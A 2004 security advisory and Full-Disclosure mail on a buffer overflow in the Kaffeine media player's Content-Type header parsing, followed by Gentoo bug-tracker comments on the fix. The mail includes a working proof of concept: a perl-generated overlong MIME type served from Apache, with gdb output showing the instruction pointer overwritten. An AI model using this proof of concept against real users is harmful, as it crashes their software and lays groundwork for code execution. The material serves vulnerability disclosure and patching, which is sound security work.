Kaffeine Buffer Overflow in Processing Content-Type Headers Lets Remote Users Crash the Player SecurityTracker Alert ID: 1011936 SecurityTracker URL: http://securitytracker.com/id?1011936 CVE Reference: GENERIC-MAP-NOMATCH (Links to External Site) Date: Oct 26 2004 Impact: Denial of service via network Advisory: Strategic Reconnaissance Team Version(s): 0.4.2 and more recent versions Description: A buffer overflow vulnerability was reported in Kaffeine. A remote user can cause a target user's media player to crash. KF of Secure Network Operations reported that a remote user can create a specially crafted RealAudio 'ram' playlist that, when loaded by the target user, will trigger a buffer overflow within the Kaffeine player. The overflow resides in the processing of Content-Type headers in the http_open() function in 'http.c'. The file can cause the target user's player to crash. It may be possible to execute arbitrary code, but that was not confirmed in the report. The vendor has been notified without response. Impact: A remote user can cause the target user's player to crash. Solution: No solution was available at the time of this entry. Vendor URL: kaffeine.sourceforge.net/ (Links to External Site) Cause: Boundary error Underlying OS: Linux (Any) Reported By: KF <kfinisterre@secnetops.biz> ______________________________ Date: Mon, 25 Oct 2004 20:06:24 -0500 From: KF <kfinisterre@secnetops.biz> Subject: [Full-Disclosure] Kaffeine Media Player Conteny Type overflow This is a multi-part message in MIME format. --------------090506020900000004060303 Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit Author did not respond and I could not exploit... enjoy. there will be a proper advisory when I am not being so lazy -KF --------------090506020900000004060303 Content-Type: text/plain; name="Kaffeine_vuln.txt" Content-Transfer-Encoding: 7bit Content-Disposition: inline; filename="Kaffeine_vuln.txt" Kaffeine >=0.4.2 http://kaffeine.sourceforge.net/download.html Tested on SuSE Linux 9.1 on source compiled from kaffeine-0.4.3b.tar.bz2 also Tested on various SuSE and Fedora RPMS On SuSE Linux 9.1 (i586) - Kernel 2.6.5-7.108-default http://www.suse.com/us/private/download/linuks/i386/update_for_9_1/extra.html 1558f5f4178cc1acbac0a068fb0bf43c kaffeine.rpm ftp://packman.iu-bremen.de/testing/xine-cvs/kaffeine/ kaffeine-0.5cvs-200409180035.i686.rpm ftp://packman.iu-bremen.de/suse/9.1/i686/ kaffeine-0.4.3b-0.pm.0.i686.rpm http://rpm.pbone.net/index.php3/stat/17/dept/5/idg/Productivity_Multimedia_Video_Players kaffeine-0.4.2-6.i586.rpm Fedora Core release 2.90 (FC3 Test 1) Kernel 2.6.7-1.478custom on an i686 http://rpmseek.com/rpm-pl/kaffeine.html?hl=com&cx=0:: kaffeine-0.4.3-0.lvn.1.b.2.i386.rpm kaffeine-0.4.3-0.lvn.1.b.1.i386.rpm This can be triggered via any Real Audio Media - ram playlist file. kaffeine-0.4.3b/kaffeine/playlist.cpp: These are your file limitations. PlayList::LoadRamPlaylist( const KURL& kurl, QListViewItem* after) .. /* check for ram playlist */ if ( (ext == "ra") || (ext == "rm") || (ext == "ram") || (ext == " lsc") || (ext == "pl") ) { ... The overflow occurs here. kaffeine-0.4.3b/kaffeine/http.c: static http_t *http_open (const char *mrl) { http_t *this; ... if (sscanf(this->buf, "Content-Type: %s", mime_type) == 1) { Sample exploitation. To cause the exploit modify /etc/mimetypes for the .ram extension make it AAAAAAAAAAAAAAAAAAAAA.... instead of audio/x-pn-realaudio linux:/srv/www/htdocs # echo `perl -e 'print "A" x 316 . "ZZZZABCD"'` ram > /e tc/mime.types ; /etc/init.d/apache2 restart Syntax OK Shutting down httpd2 (waiting for all children to terminate) done Starting httpd2 (prefork) [root@threat root]# kaffeine http://192.168.1.207/test.pl http: content length = 30 bytes http: content type = 'text/plain;' http: content length = 0 bytes http: content type = 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAZZZZABCD' [root@threat root]# KCrash: Application 'kaffeine' crashing... create a file named exme.ram in your wwwroot and create a file named test.pl with the contents: http://host/exme.ram Upon reading the test.pl file either via http or via double click kaffeine will attempt to download the file exme.ram. It will check the mimetype that the server is offering and procede to copy it into a small buffer. This can also be exploited by directly viewing the .ram file. exact eip hit looks like this gdb) c Continuing. http: content length = 30 bytes http: content type = 'text/plain;' http: content length = 0 bytes http: content type = 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAZZZZABCD' Program received signal SIGSEGV, Segmentation fault. [Switching to Thread -150400896 (LWP 2328)] 0x080b869c in SubtitleChooser::staticMetaObject () (gdb) bt #0 0x080b869c in SubtitleChooser::staticMetaObject () #1 0x5a5a5a5a in ?? () #2 0x44434241 in ?? () #3 0x097a1200 in ?? () #4 0x00000000 in ?? () #5 0x00000000 in ?? () #6 0x00000000 in ?? () #7 0x00000000 in ?? () #8 0xfef17b28 in ?? () #9 0x09794b70 in ?? () #10 0x05f04ac0 in kde_malloc_is_used () from /usr/lib/libkdecore.so.4 #11 0x00000018 in ?? () #12 0x05f04ac0 in kde_malloc_is_used () from /usr/lib/libkdecore.so.4 #13 0x096c3770 in ?? () #14 0x096c3760 in ?? () #15 0x05f04ac0 in kde_malloc_is_used () from /usr/lib/libkdecore.so.4 #16 0xfef17b48 in ?? () #17 0x05ec8dea in malloc () from /usr/lib/libkdecore.so.4 Previous frame inner to this frame (corrupt stack?) (gdb) i f Stack level 0, frame at 0xfef17ae0: eip = 0x80b869c in SubtitleChooser::staticMetaObject(); saved eip 0x5a5a5a5a called by frame at 0xfef17ae4 Arglist at 0xfef17ad8, args: Locals at 0xfef17ad8, Previous frame's sp is 0xfef17ae0 Saved registers: ebp at 0xfef17ad8, eip at 0xfef17adc 0xfeea9b20: 'A' <repeats 200 times>... 0xfeea9be8: 'A' <repeats 116 times>, "ZZZZABCD" --------------090506020900000004060303--
Upstream contacted.
Problem is fixed in current Kaffeine CVS. I'll release a new version in some days. For older versions: Simple comment out this code part in http.c /*if (sscanf(this->buf, "Content-Type: %s", mime_type) == 1) { printf ("http: content type = '%s'\n", mime_type); strcpy(this->mime_type, mime_type); } */ Kaffeine don't use the detected mime type.
Upstream fixed, please provide a patched ebuild.
I've patched these ebuilds: <<< kaffeine-0.4.3b-r1.ebuild <<< kaffeine-0.5_rc1-r1.ebuild amd64: as kaffeine-0.4.2.ebuild was marked stable for amd64, please test and mark stable kaffeine-0.4.3b-r1.ebuild
insecure versions removed. stable on amd64.
Chris White any news on the similar issue? Please vote for GLSA.
It's a B2, not a B4... so there should be a GLSA
I propose combining GLSA with bug #70055
GLSA 200411-14